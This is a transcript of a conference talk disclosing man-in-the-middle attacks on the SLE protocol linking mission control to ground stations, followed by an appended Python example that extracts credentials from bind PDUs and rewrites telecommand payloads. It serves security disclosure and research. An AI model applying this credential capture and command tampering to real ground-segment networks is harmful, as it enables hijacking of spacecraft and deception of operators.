
So in recent years space missions have been increasingly subject to security breaches, data breaches, and sometimes even satellite hacks. Most of the discussion revolves around the space segment, so like direct means of communicating with the satellite. However, it is the ground segment that is most likely to be targeted by the adversaries, and that's because of its large attack vector, or attack surface. So in this presentation I will give you a brief overview of the space and ground segment and how they relate to each other from the attack surface point of view. I will introduce you to the SLE protocol and the security aspects of it, and then I will demonstrate a couple of exploitation techniques which potentially give you the possibility to take over control of a spacecraft.

So every space mission can be loosely divided into space segment and ground segment. Obviously the space segment is very complex; if you think about a spacecraft, it's a very complex device. But then if you think about it further, it is just like one single point in a system. It has one interface, which means that from the attack surface point of view it is just one element, and therefore the attack surface is very small. On top of that, the communication with the spacecraft is challenging, and it's not because of the technical aspects but rather because of the environmental aspects, like visibility, orbit, or the distance between Earth and the spacecraft.

The ground segment, on the other hand, consists of many interconnected components. They are all on the ground, and there are many entry points; because of that it creates, or imposes, a large attack surface. On top of that, to hack into a ground station you don't need any sophisticated equipment, because it runs on standard infrastructure. And also most of the software that is developed for the space industry is custom development, which means that it creates, or imposes, additional avenues for new vulnerabilities.

So at an extremely high level, this is how a space mission more or less looks. You have a space asset, which is on the space segment, and then everything else is on the ground, where you have a ground station, the MCS, which stands for mission control system, and then you have some users which use the MCS to communicate to the ground station and the spacecraft. So the point I'm trying to make is it's going to be much easier to hack into these things instead of building it, if you actually want to try to hack a spacecraft.

So now about SLE. SLE stands for Space Link Extension protocol. In principle it's a protocol that lets the users send commands to a spacecraft and receive telemetry from the spacecraft. It is based on TCP/IP, it supports encoding and authentication, and it can have two roles: SLE user and SLE provider. Now the SLE provider is a ground station in a nutshell, and the SLE user is a process which is going to run on the mission control system. So in a nutshell, SLE defines a protocol for transferring PDUs using TCP/IP for data transfer and ASN.1 for data encoding. If you remember the previous diagram, this is where SLE is: it's the link between the mission control system and the ground station.

And now if you are thinking or wondering who is actually using this protocol for space missions, the answer is absolutely everyone. These are the most famous suspects. If you look at the documentation you will find a list of agencies that take care of the development and maintenance of the protocol, and then three times as many other organizations and entities who are actually using the protocol for their space missions. It is also present on most of the ground segment devices; there's special equipment which runs in the ground segment. And also many organizations advertise it as a protocol on the list of their interfaces and capabilities, like in this case the NASA Near Space Network.

So for our research we have decided to focus only on the commanding capabilities, because we want to demonstrate how easy it is to take over a spacecraft if you have access to the ground station, or the ground segment in general. So we focus on the FCLTU, which stands for Forward Communications Link Transmission Unit, and it's basically the thing that the users use to send commands to the spacecraft through the ground station. It defines a number of operations; the ones which we use in our exploitation techniques are bind, unbind, start, stop and transfer data, and you'll see in a moment what they are.

From the security standpoint, because I'm going to talk about the security of SLE: there is no data privacy, there is no encryption on the protocol level. There is sequence numbering to potentially prevent operation injection, but that is trivial to bypass, which we will see later. It comes with authentication, but again there is no encryption, only the credentials are encrypted, so it's very easy to bypass that using a man-in-the-middle attack as well.

So in our testing environment we decided to keep it simple. We have an SLE provider, which as I mentioned before is
a ground station; in our case it's just a Debian machine with the ESA SLE API implementation. We have the SLE user, which is the mission control system, running on Debian with another implementation of SLE called python-sle; it's a Python package. And this is just to demonstrate that it doesn't matter what implementation you use: as long as you use it, you're going to be vulnerable, because the implementation follows the standard, otherwise it's not going to work at all. And of course we have an attacker machine somewhere in the middle. So this is an assumed-breach testing scenario, so the adversaries are already in the network.

As I mentioned before, there is no encryption, so we thought that the best way to demonstrate this, or the most impactful way to demonstrate this, is going to be using a man-in-the-middle attack. So we basically start with ARP spoofing, we capture the TCP frames, we decode the TCP frames, or the data that they carry in the data field, which are the ISP1 frames, and I'll tell you what that is in a second. We manipulate the SLE PDUs, which are the elements that go to the spacecraft, and we update the TCP frame and then forward it to the destination.

So like in any other man-in-the-middle attack, we poison the ARP tables between the mission control system and the ground segment, we make the traffic go through the attacker's node, we capture the TCP frames, put them in the NFQUEUE for processing, and this is actually where the fun begins. As mentioned before, we are operating at the TCP level, so the TCP frame's data field contains the PDUs, the data units, in the ISP1 format. Now ISP1 is an extension of the ASN.1 encoding, or format, which means that to decode it we simply use TLV fields to understand what the values are. They are custom, context-specific structures and sequences, but they are specified in the documentation, so it's very easy to find what they are. And so once we understand what those structures are, then we can do the mapping to the FCLTU data type specification, which is also in the documentation.

So this is how it looks. This is an example of an FCLTU bind message that goes from the mission control system to the ground station. You can see that there is a sequence, there is the typical structure of the TLV, and also somewhere there you will find credentials.

So I will start with some demonstration now. I have a couple of videos recorded, but before I show you the exploitation techniques I will show you how the nominal behaviour looks, how the nominal communication between the mission control system and the ground station looks. So in this video you will see an FCLTU bind message, which is basically going to be this byte string, then we're going to send the start, which will set up some ground station equipment at the ground station, and then we're going to transfer some data, then we're going to do stop and then unbind. So that's how the nominal communication would look. On the top you have the SLE user, which is the mission control system, and then the SLE provider on the bottom, which is the ground station. And of course it doesn't play. Okay, I'm unprepared for that. I'm going to try to play this way.

So you're going to see this sequence of actions throughout the rest of the presentation on the other demos. So as I said before, we start the ground station at the bottom and then we run our routine on the top. The mission control system is communicating and sending some data to the ground station, which in the end will be sent to the spacecraft, because the ground station is just a thing that pushes forward the command products. So that's how it looks nominally.

Now there are a couple of things we can do about it to make life more difficult for the operators. One of them is to prevent authentication. The reason why it's extremely annoying for the users is because at the protocol level there is no feedback when you fail authentication, which means that if you fail authentication the ground station is going to drop the connection with no indication whatsoever. As a user you have no idea what's going on. So it's going to be quite interesting to see that actually in practice. So what we do here: we capture the frames with the bind message, we mangle the credentials, and then we push it forward to the ground station.
So the setup is pretty much the same, except that on the left-hand side you have our exploit that runs the man-in-the-middle attack. So we start the ground station and we go about with our routine, we connect, we bind... oh, okay, that's because I'm still in the presentation. I swear it worked when I was testing it.

So: ground station, mission control system. We start our routine, we send the bind request, we capture the credentials by the way, and we are in a weird state that we cannot... hold on. Okay, this was just about capturing the credentials, it was not mangling. So okay, let me reverse it back. So what you have just seen was a demo that you can actually capture the credentials, you can store them for later use, and then you can use them to establish your own SLE session between the attacker machine and the ground station, in order to hijack the communication of a spacecraft as if you were the legitimate user. So that's how you were capturing the credentials.

Now let me show you the next one. Of course it is very tempting to start mangling with the data that you actually send to the spacecraft. It's night now. So what you will see is again the standard communication between the mission control system and the ground station, but instead of messing up with the operations we're going to actually capture the data. We are going to be looking for a specific byte string, and then we're going to change it to something of our liking. So as you can see on the top we have our exploit; we are searching, or monitoring, on the wire for a string of bytes, and then once we see it we're going to change it to something else, and this is what is going to be sent to the spacecraft instead of the actual telecommand products. So we start our exploit, start the ground station, and again the users go about the routine as per usual. Now you can see that the users have sent a byte string from 0 to 9, we have captured it, and then we sent something else, what we have defined in the exploit. You can see that there is no integrity check; neither the MCS users nor the ground station have realized that you can actually do that, or that someone has actually done that. So you are still operating in a stealth mode.

Okay, and the last demo I have for you is when you try to take over the actual session. So what you will see is we're going to put all of that together: we're going to capture the credentials, we're going to modify them in order to fail the user authentication process, but we're going to establish our own session using the user's credentials, and from that moment we will be able to command the spacecraft, or try to send the commands which will be delivered to the spacecraft. The setup is pretty much the same; on the left-hand side, at the bottom, there is our, or the attacker's, mission control system that's going to be pretending to be the legitimate one. And you run it. We do exactly the same thing as before: we capture the credentials, we fail the authentication, only the ground station knows that authentication failed, the user has no idea, but we capture the credentials and we establish our own SLE session as if we were the legitimate user of the ground station. So from now on we can command the spacecraft to our liking.

Okay, conclusion. What you have just seen is just one way you can actually think of taking over control of a spacecraft if you know what the vulnerabilities of the SLE protocol are. In our research we only focused on the telecommanding capabilities because we wanted to render as much impact as possible, but of course we can also start our operations in a more stealthy mode and process the telemetry, and also modify the telemetry, so then the operators don't know what is happening because it's going to be false. If you want to have a meaningful communication with a spacecraft there is some spacecraft knowledge required, because you need to
understand the command products which you are sending to the spacecraft, or the spacecraft has to understand what you are sending to it. But otherwise all the knowledge which I have presented was gathered using OSINT, so all the documentation is made available publicly, and so anyone can actually do the research. CCSDS, the standardization body which is responsible for SLE, came up with Space Data Link Security, which is basically imposing encryption on it; however, they have done that only on the link between the ground station and the spacecraft itself, which means that the link between the mission control system and the ground station is still vulnerable. And we are now working with them to enable TLS-like features on the ISP1 level in order to mitigate those issues.

So for the further work, we are planning to run some tests on an actual ground station, which we know is the SMILE lab; they have Cortex devices. So our idea would be to actually demonstrate it on the actual ground station devices, and then we're going to further work on the exploit. We've come up with some additional ways to demonstrate these vulnerabilities of the standard, and I guess at some point we're going to open source it.

So this is a list of references; you will find the whole list in the publication. As I said, everything is open source, so you can do your own research on this, and our research you can find on this URL. We have done some additional research on other ground segment and space segment applications, mainly from NASA open source software, so if you are interested in that you can just follow the links. I guess I can give it later after the talk. And that was the last slide. Thank you very much. [Applause]

Yeah, thank you Andy. Any questions from the audience? There's one question over there. Wait for the microphone, that way NASA can also listen in on what you're asking.

Thanks a lot for your talk. Do you have any insights on real-world attacks leveraging the methodologies you described?

No.

Okay, thanks nevertheless. Any other question?

Oh yeah, I have a question on the slide at the beginning about confidentiality and integrity protection. You were saying there is a sequence number, so that helps with replay protection, but what is actually there for integrity protection of a message?

What is there to do what?

So you had this slide that talked about confidentiality and integrity protection, right? You talked about a sequence number. So a sequence number helps with replay protection, but it does not provide integrity protection. So my question is, what is there for integrity protection of a message?

There is no integrity protection. You can put whatever you want.

Okay, so the sequence... so that's the whole point.

That's the whole point, yeah.

Right, so the sequence number was useless?

Yes, absolutely.

Okay, thanks.

That's what I said, it is trivial to bypass.

Any other question from the audience? No? Going once, going twice. Well, thank you very much Andy again for the great talk, it was really far out there.
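Editor's added example, not part of the talk and not the speaker's tooling: the decode, modify, re-encode step that the credential-capture and payload-mangling demos rely on, written as a small BER TLV walker in Python. Because SLE PDUs are ASN.1 BER on the wire and carry no MAC or checksum, an attacker in the middle needs nothing more than generic TLV handling to read a credential octet string out of a bind invocation, or to swap the CLTU octet string in a transfer-data invocation and fix up the enclosing lengths so the result still parses. The PDU layouts, the context tags [0] and [1], the field names and the sample payloads below are assumptions made for this example and are not the FCLTU definitions from the CCSDS specification; the ARP spoofing and NFQUEUE plumbing around this step is left out.

```python
"""Decode -> modify -> re-encode of BER TLV PDUs, as an attacker in the middle would.
Editorial example, not code from the talk. The layouts are assumptions, not the
CCSDS FCLTU definitions:
  bind-like invocation      [0] { credentials OCTET STRING, initiator OCTET STRING }
  transfer-data-like invoc. [1] { cltuIdentification INTEGER, cltuData OCTET STRING }
"""
from dataclasses import dataclass, field
from typing import Iterator, List, Optional

TAG_BIND = b"\xa0"           # assumed: context-specific, constructed, [0]
TAG_TRANSFER_DATA = b"\xa1"  # assumed: context-specific, constructed, [1]
TAG_INTEGER = b"\x02"
TAG_OCTET_STRING = b"\x04"


@dataclass
class Node:
    tag: bytes                                             # single identifier octet
    content: bytes = b""                                   # primitive content
    children: List["Node"] = field(default_factory=list)  # constructed content

    @property
    def constructed(self) -> bool:
        return bool(self.tag[0] & 0x20)


def encode_length(n: int) -> bytes:
    """Definite-length BER: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def encode(node: Node) -> bytes:
    body = b"".join(encode(c) for c in node.children) if node.constructed else node.content
    return node.tag + encode_length(len(body)) + body


def decode(buf: bytes) -> List[Node]:
    """Parse consecutive TLVs (low tag numbers, definite lengths) into a tree."""
    nodes, i = [], 0
    while i < len(buf):
        if i + 2 > len(buf):
            raise ValueError("truncated TLV header")
        tag, first = buf[i:i + 1], buf[i + 1]
        i += 2
        if first & 0x80:                       # long-form length
            n = first & 0x7F
            if n == 0:
                raise ValueError("indefinite length not supported")
            length, i = int.from_bytes(buf[i:i + n], "big"), i + n
        else:
            length = first
        body = buf[i:i + length]
        if len(body) != length:
            raise ValueError("truncated TLV body")
        i += length
        node = Node(tag)
        if node.constructed:
            node.children = decode(body)
        else:
            node.content = body
        nodes.append(node)
    return nodes


def octet_strings(nodes: List[Node]) -> Iterator[Node]:
    """Yield every primitive OCTET STRING node in document order."""
    for n in nodes:
        if n.constructed:
            yield from octet_strings(n.children)
        elif n.tag == TAG_OCTET_STRING:
            yield n


def build_bind(initiator: bytes, credentials: bytes) -> bytes:
    return encode(Node(TAG_BIND, children=[Node(TAG_OCTET_STRING, credentials),
                                           Node(TAG_OCTET_STRING, initiator)]))


def build_transfer_data(cltu_id: int, cltu: bytes) -> bytes:
    ident = cltu_id.to_bytes((cltu_id.bit_length() + 8) // 8, "big", signed=True)
    return encode(Node(TAG_TRANSFER_DATA, children=[Node(TAG_INTEGER, ident),
                                                    Node(TAG_OCTET_STRING, cltu)]))


def harvest_credentials(pdu: bytes) -> Optional[bytes]:
    """Credential capture: the first octet string of the bind PDU is readable off the wire."""
    for top in decode(pdu):
        if top.tag == TAG_BIND:
            found = list(octet_strings([top]))
            return found[0].content if found else None
    return None


def rewrite_transfer_data(pdu: bytes, wanted: bytes, replacement: bytes) -> bytes:
    """Payload mangling: swap the CLTU bytes and re-encode every enclosing length."""
    tree, hit = decode(pdu), False
    for top in tree:
        if top.tag != TAG_TRANSFER_DATA:
            continue
        for node in octet_strings([top]):
            if node.content == wanted:
                node.content, hit = replacement, True
    return b"".join(encode(n) for n in tree) if hit else pdu


if __name__ == "__main__":
    # Constructed sample traffic, not a real capture.
    print("credentials:", harvest_credentials(build_bind(b"MCS-USER", b"s3cret")))
    original = build_transfer_data(7, bytes(range(10)))     # the 0..9 byte string from the demo
    forged = rewrite_transfer_data(original, bytes(range(10)), b"\xaa" * 200)
    print("original:", original.hex())
    print("forged  :", forged[:8].hex(), "... (%d bytes)" % len(forged))
```

The replacement is deliberately longer than the original so that the enclosing length switches from short to long form; the re-encoded PDU still parses on the receiving side, which is the point the question at the end of the talk drives at: with no integrity protection, fixing up lengths is all the attacker has to get right.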